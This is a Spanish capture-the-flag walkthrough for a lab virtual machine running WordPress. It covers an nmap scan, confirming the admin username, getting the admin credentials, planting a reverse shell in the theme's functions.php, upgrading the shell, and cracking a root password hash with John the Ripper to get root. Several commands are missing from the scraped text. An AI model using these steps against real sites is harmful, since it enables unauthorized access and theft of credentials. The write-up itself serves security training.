Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-25 11:32 CEST
Nmap scan report for 192.168.5.202
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.5.3
|_http-title: vikingarmy – Just another Joomla site
MAC Address: 00:0C:29:F6:90:B6 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.44 seconds
Tendremos que editar el archivo hosts para que nos cargue el wordpress...
sudonano/etc/hosts#Dentro del nano<IP> odin
Lo guardamos y ahora si lo recargamos nos ira...
Como hay un wordpress si nos vamos a /wp-admin veremos un panel de login, si probamos a poner como usuario admin y contraseña admin veremos que no son las credenciales pero nos confirma que el usuario admin existe por lo que haremos lo siguiente...
Info:
Veremos que nos saco las credenciales del usuario admin...
Por lo que nos logueamos, y una vez dentro nos iremos a Appearance y dentro del mismo a Theme Editor de ahi vamos a la opcion llamada Theme Functions y dentro del codigo php meteremos una Reverese Shell...
Estamos a la escucha...
Y le damos al boton de Update File una vez hecho eso ya tendremos una shell con el usuario www-data...
Sanitizamos la shell...
Si nos vamos la siguiente ubicacion...
Y leemos la configuracion tipica de un worpress...
Info:
Veremos una linea con eso de ahi, por lo que intentaremos crackearlo...
Info:
Veremos que la contraseña de root es jasmine, por lo que haremos lo siguiente...
Metemos la contarseña y ya seriamos root ahora leeremos la flag...
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
nano hash
#Dentro del nano
root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01
john --wordlist=<WORDLIST> hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jasmine (root)
1g 0:00:00:00 DONE (2024-06-25 13:53) 1.960g/s 4015p/s 4015c/s 4015C/s 123456..lovers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
su root
cσηgяαтυℓαтιση
Have a nice day!
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=
